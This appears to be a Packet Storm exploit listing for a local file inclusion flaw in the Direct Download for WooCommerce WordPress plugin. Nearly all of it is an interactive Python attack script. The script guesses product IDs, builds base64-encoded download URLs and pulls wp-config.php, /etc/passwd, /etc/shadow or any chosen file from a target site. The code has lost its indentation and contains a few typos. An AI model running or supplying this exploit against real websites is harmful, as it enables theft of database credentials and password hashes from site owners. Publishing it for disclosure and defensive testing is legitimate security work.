what you don't know can hurt you

WordPress WooCommerce Direct Download Local File Inclusion

WordPress WooCommerce Direct Download Local File Inclusion
Posted Jan 17, 2017
Authored by Diego Celdran Morell

WordPress Direct Download for WooCommerce versions up to 1.15 suffer from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
MD5 | bb66f3e733500d157bafada42f0d1eba

WordPress WooCommerce Direct Download Local File Inclusion

Change Mirror Download
#lfi_attack_for_direct_download_woocommerce.py

#
# Author: Diego Celdran Morell
# Web: http://www.diegoceldran.es/
# Fecha Ultima actualizacion: 15/01/2017
# Version: V1.0
# No me hago responsable del mal uso que se le pueda dar a esta herramienta
#

import os;


try:
#pip install urlopen
import requests;

except (Exception):
#ejecutar pip install urlopen
print(" Installing required modules...");
os.system("pip install requests");
from urllib2 import urlopen


try:
#pip install urlopen
import base64;

except (Exception):
#ejecutar pip install urlopen
print(" Installing required modules...");
os.system("pip install base64");
import base64


def make_exploit(download_link):
lnk_download = download_link;

parts = lnk_download.split("/direct-download/");
toDecode = parts[1];
domain = parts[0];

if (toDecode[:-1] == "/"):
toDecode = toDecode[:count(toDecode)-1];

else:
toDecode = toDecode;

decoded = str(base64.b64decode(toDecode.encode('ascii')).decode('utf-8'));

productID = decoded.split("|")[0];

print(" ");
print(" ProductID: " + productID);
print(" ");
eject_exploit(productID, domain);


def eject_exploit(productID, domain):
print(" Select a file to download");
print(" [0] wp-config.php");
print(" [1] /etc/passwd");
print(" [2] /etc/shadow");
print(" or select another path to file to download");
print(" ");
optDownload = input(" >>> ");
print(" ");


if (domain[:7] == "http://"):
domain = domain;

elif (domain[:8] == "https://"):
domain = domain;

else:
domain = "http://" + domain;


if (optDownload == "0"):
fileToDownload = "wp-config.php";

elif (optDownload == "1"):
fileToDownload = "/etc/passwd";

elif (optDownload == "2"):
fileToDownload = "/etc/shadow"

else:
fileToDownload = optDownload;

url = domain + "/direct-download/" + base64.b64encode((str(productID) + "|" + fileToDownload).encode('ascii')).decode('utf-8');

print(" Downloading " + fileToDownload + " file from " + domain);
print(" Accesing to " + url);
print(" ");

req = requests.get(url);

if (req.status_code == 200):
print(" File downloaded correctly!");

fileName = fileToDownload.replace("\\", "/");
file = fileName.split("/");
fileText = str(file[-1]);

f = open(fileText, 'w');

f.write(req.text);

f.close();

print(" Acces to this file in: " + str(os.path.dirname(os.path.abspath(__file__))) + " folder");
print(" ");

else:
print(" [-] This domain is not vulnerable");

eject_exploit(productID, domain);


def get_product_id(domain, minID, maxID):
if(maxID == False):
maxID = 999999999999999999;

url = "";

if (domain[:7] == "http://"):
print(domain[:7]);
url = domain;

elif (domain[:8] == "https://"):
prin(domain[:8]);
url = domain;

else:
url = "http://" + domain;


if (url[:-1] == "/"):
url = url + "direct-download/";

else:
url = url + "/direct-download/";


actuallyId = minID;
idProduct = 0;

while (idProduct == 0 and actuallyId <= maxID):
encodedURL = base64.b64encode((str(actuallyId) + "|").encode('ascii'));
urlToTest = url + str(encodedURL.decode("utf-8")) + "/"
print(" Testing ID: " + str(actuallyId) + "; Getting URL: " + urlToTest);
#print("");

req = requests.get(urlToTest);

if (req.status_code == 200):

if("This product is not available for direct free download." in req.text):
# testing text you recibe
print(" [-] No product fount with ID: " + str(actuallyId));
print(" ");

else:
print(" [+] A product ID was fount: " + str(actuallyId));
print(" ");
idProduct = actuallyId;

else:
print(" [-] This domain is not vulnerable");

actuallyId = actuallyId+1;

if (idProduct != 0):
eject_exploit(idProduct, domain);


def testin_get_a_download_link(domain):
print(" Do you want try to find a valid URL for the website?");
print(" [0] no, exit");
print(" [1] yes, it may have a long time");
print(" ");
test_find = input(" >>> ");
print(" ");

if (test_find == "1"):
# Proseguir
print(" Please select the minimun id to find the product (0 to none; minimun id to start recomended: 400)");
minID = input(" >>> ");
print(" ");

if (minID == "0"):
minID = 1;

else:
minID = int(minID);

print(" Please select the maximun id to find the product (0 to stop manually when you want)");
maxID = input(" >>> ");
print(" ");

if (maxID == "0"):
maxID = False;

else:
maxID = int(maxID);

get_product_id(domain, minID, maxID);

else:
exit();


def get_download_link(domain):
print(" Please");
print(" Set a download link from the website: ");
print(" [0] I don't have any download link");
print(" ");
download_link = input(" >>> ");
print(" ");

if (download_link == "0"):
testin_get_a_download_link(domain);

else:
make_exploit(download_link);


def get_download_link_no_domain():
print(" Please");
print(" Set a download link from the website: ");
print(" [0] I don't have any download link");
print(" ");
download_link = input(" >>> ");
print(" ");

if (download_link == "0"):
print(" Please, select the domain to attack");
domain = input(" >>> ");
print("");
testin_get_a_download_link(domain);

else:
make_exploit(download_link);


def check_vulnerable_domain(domain = "diegoceldran.es"):
# Check if domain/direct-download/a/ return any thing
if (domain[:7] == "http://"):
url = domain;

elif (domain[:8] == "https://"):
url = domain;

else:
url = "http://" + domain;

if (url[:-1] == "/"):
url = url + "direct-download/a/";

else:
url = url + "/direct-download/a/";


req = requests.get(url);
if (req.status_code == 200):
print(" The web site: " + url + " respond: ");
print(" " + req.text);
print(" [+] This domain is maybe vulnerable");
print(" ");

get_download_link(domain);

else:
print(" [-] This domain is not vulnerable");

print(" ");
print(" LFI Attack for Direct Download Woocommerce plugin is started!");
print(" ");
print(" If you're using this module out of BrutiFramework, please, visit");
print(" http://www.diegoceldran.es/brutiframework-alfa/ to Download ");
print(" BrutiFramework from the oficial site. Thanks!");
print(" ");
print(" IMPORTANT:\n NO USE THIS EXPLOIT FOR ILEGAL PURPOSES");
print(" ");
print(" Select the target: (ej: www.diegoceldran.es)");
print(" [0] Omit the checking progress");
print(" ");
domain = input(" >>> ");
if (domain != "0"):
print(" ");
print(" Checking " + domain + "...");
print(" ");
check_vulnerable_domain(domain);

else:
print(" ");
get_download_link_no_domain();
Login or Register to add favorites

File Archive:

August 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    1 Files
  • 2
    Aug 2nd
    7 Files
  • 3
    Aug 3rd
    5 Files
  • 4
    Aug 4th
    7 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close